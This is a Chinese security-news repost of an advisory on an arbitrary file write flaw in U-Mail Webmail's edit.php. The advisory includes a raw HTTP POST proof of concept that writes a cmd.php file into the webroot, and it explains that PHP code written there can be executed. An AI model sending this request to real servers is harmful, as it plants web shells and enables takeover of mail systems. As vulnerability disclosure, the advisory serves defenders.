软件下载 | 资讯教程 | 最近更新 | 下载排行 | 一键转帖 | 发布投稿
您的位置:最火下载站 > 资讯阅读 > 安全资讯 > U-Mail Webmail 'edit.php'任意文件修改漏洞

U-Mail Webmail 'edit.php'任意文件修改漏洞

U-Mail专家级邮件系统是福洽科技最新推出的第四代企业邮局系统。U-Mail邮件系统的edit.php文件没有正确地处理HTTP POST参数,远程攻击者可以通过提交恶意请求向webroot下的任意文件写入数据。如果向带有.php扩展的文件写入了PHP代码的话,就可能导致执行任意代码。

  <*来源:wangshennan (wsn1983@gmail.com)

  链接:http://secunia.com/advisories/32540/

  http://milw0rm.com/exploits/6898*>

  测试方法:

  警 告

  以下程序可能带有攻击性,仅供安全研究之用。使用者风险自负!

      POST /webmail/modules/filesystem/edit.php HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
  application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-
  xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
  Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
  Accept-Language: zh-cn
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
  Host: mail.d4rkn3t.cn
  Content-Length: 120
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18
  path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=

  建议:

  厂商补丁:

  目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://www.comingchina.com/index.html

    相关阅读
    栏目导航
    推荐软件